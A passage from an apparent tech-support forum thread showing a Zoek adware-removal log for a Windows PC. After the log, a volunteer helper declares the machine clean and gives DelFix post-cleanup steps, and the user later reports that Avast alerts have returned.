F647D0BEA553C1D0C251CE07DA6A5511 - C:\Program Files\Mozilla Firefox\plugins\nppdf32.dll - Adobe Acrobat
2ED65CF5725FCD0DFD40F87782AE37D5 - C:\Windows\system32\Macromed\Flash\NPSWF32_11_4_402_265.dll - Shockwave Flash
F647D0BEA553C1D0C251CE07DA6A5511 - C:\Program Files\Adobe\Reader 10.0\Reader\browser\nppdf32.dll - Adobe Acrobat
DB988B4550DB9BCE86F9199D961057FC - C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll - Adobe Acrobat
15E298B5EC5B89C5994A59863969D9FF - C:\Windows\system32\npmproxy.dll - Microsoft® Windows® Operating System

==== Chromium Look ======================

Google Chrome Version: 43.0.2357.124

HKEY_LOCAL_MACHINE\SOFTWARE\Google\Chrome\Extensions
fgbcffenncokfocljomejddmgcpppjom - No path found
gomekmidlodglbbmalcneegieacbdmki - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx[31/12/2014 21:20]

Google Voice Search Hotword (Beta) - home\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn
Google Cast - home\AppData\Local\Google\Chrome\User Data\Default\Extensions\boadgeojelhgndaghljhdicfkmllpafd
Avast Online Security - home\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki
Ask Toolbar - home\AppData\Local\Torch\User Data\Default\Extensions\aaaalejpmnocmhmlbmlkjemekckoagne
Docs - home\AppData\Local\Torch\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake
DropToS - home\AppData\Local\Torch\User Data\Default\Extensions\cipmepknanmbbaneimacddfemfbfgpgo
Torch Music - home\AppData\Local\Torch\User Data\Default\Extensions\gcjbdjlojcomlphfchhihkigepfabcad
Domain Error Assistant - home\AppData\Local\Torch\User Data\Default\Extensions\icdlfehblmklkikfigmjhbmmpmkmpooj
Torch Helper - home\AppData\Local\Torch\User Data\Default\Extensions\lecpjhggilhbceadobnggaagnpfpafhg
Slick Savings - home\AppData\Local\Torch\User Data\Default\Extensions\mhkaekfpcppmmioggniknbnbdbcigpkk
Torch Music - home\AppData\Local\Torch\User Data\Default\Extensions\ohimbkoaphfnmekmfppijeblmkncneed
Hola - home\AppData\Local\Torch\User Data\Default\Extensions\pdehmppfilefbolgganhfihpbmjlgebh

==== Chromium Startpages ======================

C:\Users\home\AppData\Local\Torch\User Data\Default\Preferences
“homepage”: “http://home.torchbrowser.com/?systemid=410&appid=20&ua=Torch&clid={8DFCA28C-B3AA-4663-8AC5-48C83E9C13F8}”,
“urls_to_restore_on_startup”: [ “http://home.torchbrowser.com/?systemid=410&appid=20&ua=Torch&clid={8DFCA28C-B3AA-4663-8AC5-48C83E9C13F8}” ]

==== Chromium Fix ======================

C:\Users\home\AppData\Local\Torch\User Data\Default\Extensions\icdlfehblmklkikfigmjhbmmpmkmpooj deleted successfully
C:\Users\home\AppData\Local\Torch\User Data\Default\Extensions\aaaalejpmnocmhmlbmlkjemekckoagne deleted successfully
C:\Users\home\AppData\Local\Torch\User Data\Default\Extensions\mhkaekfpcppmmioggniknbnbdbcigpkk deleted successfully
C:\Users\home\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mhkaekfpcppmmioggniknbnbdbcigpkk deleted successfully

==== Set IE to Default ======================

Old Values:
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
“Start Page”=“http://www.google.co.uk/

New Values:
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
“Start Page”=“http://www.google.co.uk/

==== All HKCU SearchScopes ======================

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes
“DefaultScope”=“{0633EE93-D776-472f-A0FF-E1416B8B2E3A}”
{012E1000-F331-11DB-8314-0800200C9A66} Google Url=“http://www.google.com/search?q={searchTerms}
{0633EE93-D776-472f-A0FF-E1416B8B2E3A} Bing Url=“http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE11SR
{9BB47C17-9C68-4BB3-B188-DD9AF0FD2492} default-search.net Url=“http://www.default-search.net/search?sid=492&aid=345&itype=a&ver=15005&tm=577&src=ds&p={searchTerms}

==== Deleting Registry Keys ======================

HKEY_CURRENT_USER\Software\Policies\Google deleted successfully
HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SearchSettings deleted successfully
HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Skype deleted successfully

==== Empty IE Cache ======================

C:\Users\home\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 emptied successfully
C:\Users\home\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5 emptied successfully
C:\Users\home\AppData\Local\Temp\1467f0\home\appdata\local\microsoft\windows\temporary internet files\Content.IE5 emptied successfully
C:\Users\home\AppData\Local\Temp\17b31ca0ca\home\appdata\local\microsoft\windows\temporary internet files\Content.IE5 emptied successfully
C:\Users\home\AppData\Local\Temp\2a89ee693\home\appdata\local\microsoft\windows\temporary internet files\Content.IE5 emptied successfully
C:\Users\home\AppData\Local\Temp\77d11180\home\appdata\local\microsoft\windows\temporary internet files\Content.IE5 emptied successfully
C:\Users\Remote\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 emptied successfully
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 emptied successfully
C:\Windows\serviceprofiles\Localservice\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 emptied successfully
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 emptied successfully

==== Empty FireFox Cache ======================

No FireFox Cache found

==== Empty Chrome Cache ======================

C:\Users\home\AppData\Local\Google\Chrome\User Data\Default\Cache emptied successfully
C:\Users\home\AppData\Local\Torch\User Data\Default\Cache emptied successfully

==== Empty All Flash Cache ======================

Flash Cache Emptied Successfully

==== Empty All Java Cache ======================

Java Cache cleared successfully

==== C:\zoek_backup content ======================

C:\zoek_backup (files=12556 folders=192 647356047 bytes)

==== Empty Temp Folders ======================

C:\Users\Default\AppData\Local\Temp emptied successfully
C:\Users\Default User\AppData\Local\Temp emptied successfully
C:\Users\home\AppData\Local\Temp will be emptied at reboot
C:\Users\Remote\AppData\Local\Temp emptied successfully
C:\Windows\serviceprofiles\networkservice\AppData\Local\Temp will be emptied at reboot
C:\Windows\serviceprofiles\Localservice\AppData\Local\Temp emptied successfully
C:\Windows\Temp will be emptied at reboot

==== After Reboot ======================

==== Empty Temp Folders ======================

C:\Windows\Temp successfully emptied
C:\Users\home\AppData\Local\Temp successfully emptied

==== Empty Recycle Bin ======================

C:$RECYCLE.BIN successfully emptied

==== EOF on 22/06/2015 at 13:37:21.79 ======================

Excellent. A lot of malware is behind us, how is your PC behaving?

So far so good. Avast hasn’t pinged once since running Zoek. Do you reckon it has all been sorted? Was it all just one instance of malware or was there more than one?

Many thanks for all your help, TwinheadedEagle. You’re a legend :slight_smile:

There were multiple Adware infections, nothing too serious. Yes, it is sorted.

Cheers :slight_smile:

Post-cleanup procedures:

Download DelFix by Xplode and save it to your desktop.

[*]Run the tool by right-clicking on the DelFix icon and choosing the Run as administrator option.
[*]Make sure that these ones are checked:

[*]Remove disinfection tools
[*]Purge system restore
[*]Reset system settings

[*]Push Run and wait until the tool completes its work.
All tools we used should be gone. The tool will create a report for you (C:\DelFix.txt).

The tool will also record a healthy state of the registry and make a backup using the ERUNT program in %windir%\ERUNT\DelFix.
The tool deletes old system restore points and creates a fresh system restore point after cleaning.

Thanks for your help. I wouldn’t have had a clue. You’ve been amazing :slight_smile:

Hi everyone, after a day of calm. This is back with a vengeance. Avast is pinging like mad. Is there anything you can suggest to eradicate the problem once and for all? Many thanks :slight_smile: